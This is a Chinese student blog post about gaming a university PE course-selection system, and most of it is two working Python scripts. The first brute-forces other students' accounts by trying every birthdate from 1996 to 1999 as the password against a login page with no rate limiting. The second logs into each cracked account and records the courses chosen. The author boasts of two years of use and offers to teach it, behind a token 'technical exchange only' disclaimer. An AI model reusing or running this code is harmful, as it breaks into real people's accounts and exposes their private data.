每学期的学期末都是选课的时候,或者说是抢课的时候
对于刚入学第一次抢课的大一小萌新来说实在是再新鲜不过了,大概就是下面的状态
qiang-ke.gif

像打了鸡血一样,早早的守在了电脑前,甚至听说网吧网速快,然后网吧就成了下面这样
yun-ku-wang-ba.jpg

作为一个长者,我当然不能像他们一样too yang,naive
美国的华莱士我都和他谈笑风生蛤蛤蛤hhh~~
当然了我也抢不赢他们┭┮﹏┭┮

警告:本文仅作技术交流,请勿用于非法用途

正文:闷声发大财

体育教学部的选课网站是没有验证码没有登陆限制没有waf的,简称三无
最重要的是学校会为每个人生成一个默认密码,即出生年月日,例如 19980909 你想到了什么?

  • 新建xh.txt 导入学号
317XXXXXX1
317XXXXXX2
317XXXXXX3
317XXXXXX4
  • 爆破账号
import requests
import re
import os
import time
s = requests.session()

# 密码和学号
passwd = []
xh = []
with open('xh.txt','r') as f:
    for line in f.readlines():
        xh.append(line.strip('\n'))

# 这里举一个例子
url = 'http://xxx.edu.cn/sysLogin.aspx'

#生成密码
for i in range(1996,2000):   
    for j in range(1,13):
        for k in range(1,32):
            passwd.append(str(i)+str(j).rjust(2,'0')+str(k).rjust(2,'0'))

headers = {
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'Accept-Encoding':'gzip, deflate',
    'Accept-Language':'zh-CN,zh;q=0.9,ja;q=0.8',
    'Cache-Control':'no-cache',
    'Connection':'keep-alive',
    'Content-Type':'application/x-www-form-urlencoded',
    'DNT':'1',
    'Host':'xxx.edu.cn',
    'Origin':'http://xxx.edu.cn/',
    'Pragma':'no-cache',
    'Referer':'http://xxx.edu.cn/sysLogin.aspx',
    'Upgrade-Insecure-Requests':'1',
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
}
data = {
    '__EVENTTARGET':'',
    '__EVENTARGUMENT':'',
    'rbtnlJueSe':'学生',
    'btnLogin':'登录',
}

n = 0
pattern1 = r'<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="([^"]+)" />'
pattern2 = r'<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="([^"]+)" />'
pattern3 = r'<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="([^"]+)"'
for j in xh:
    print(j)
    txt = s.get('http://xxx.edu.cn/sysLogin.aspx').text
    data['__VIEWSTATE'] = re.search(pattern1,txt)[1]
    data['__VIEWSTATEGENERATOR'] = re.search(pattern2,txt)[1]
    data['__EVENTVALIDATION'] = re.search(pattern3,txt)[1]
    data['txtUserName'] = j
    for i in passwd:
        data['txtPassword'] = i
        res = s.post(url,data=data,headers=headers,allow_redirects=False)
        if(res.status_code==302):
            n = n + 1
            print("第"+str(n)+"个 密码正确!!!")
            with open('info.txt','a+') as f:
                f.write(data['txtUserName'])
                f.write("\t")
                f.write(data['txtPassword'])
                f.write('\n')
  • 查看每个账号选了什么课
import requests
import re
import os
import time
s = requests.session()

zh = []
mm = []


with open('info.txt','r') as f:
    for line in f.readlines():
        zh.append(line.strip('\n').split()[0])
        mm.append(line.strip('\n').split()[1])

url = 'http://xxx.edu.cn/sysLogin.aspx'
headers = {
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'Accept-Encoding':'gzip, deflate',
    'Accept-Language':'zh-CN,zh;q=0.9,ja;q=0.8',
    'Cache-Control':'no-cache',
    'Connection':'keep-alive',
    'Content-Type':'application/x-www-form-urlencoded',
    'DNT':'1',
    'Host':'xxx.edu.cn',
    'Origin':'http://xxx.edu.cn',
    'Pragma':'no-cache',
    'Referer':'http://xxx.edu.cn/sysLogin.aspx',
    'Upgrade-Insecure-Requests':'1',
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
}
data = {
    '__EVENTTARGET':'',
    '__EVENTARGUMENT':'',
    'rbtnlJueSe':'学生',
    'btnLogin':'登录',
}

pattern1 = r'<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="([^"]+)" />'
pattern2 = r'<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="([^"]+)" />'
pattern3 = r'<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="([^"]+)"'
pattern4 = r'<td style="width:150px;white-space:nowrap;">(.*?)</td><td style="white-space:nowrap;">(.*?)</td>'

for i in range(len(mm)):
    print(i)
    data['txtUserName'] = zh[i]
    data['txtPassword'] = mm[i]
    txt = s.get('http://xxx.edu.cn/sysLogin.aspx').text
    data['__VIEWSTATE'] = re.search(pattern1,txt)[1]
    data['__VIEWSTATEGENERATOR'] = re.search(pattern2,txt)[1]
    data['__EVENTVALIDATION'] = re.search(pattern3,txt)[1]
    res = s.post(url,data=data,headers=headers,allow_redirects=False)
    if(res.status_code==302):
        r = s.get('http://xxx.edu.cn/WLS/XuanKe_YiXuan.aspx',headers=headers)
        if(r.status_code==200):
            kc = re.search(pattern4,r.text)[2].strip('&nbsp;')
            if(kc!=''):
                with open('体育选课.txt','a+') as f:
                    f.write(zh[i]+'\t'+mm[i]+'\t'+kc+'\n')
            else:
                pass
  • 成果
    TIM截图20190118180623.png

结尾

最近没什么可更的只好把大一我还在读土木工程时写的代码拿出来水一篇
没想到两年前的代码一点不改还能运行,成功的帮我选了两年的体育课
现在我大三体育课选完了,它也完成了自己的历史使命
如本校的学妹不小心发现了这篇博文,可邮件联系我,我可将此独门秘籍传授给她,手把手教学
学弟走开~

标签: 抢课

添加新评论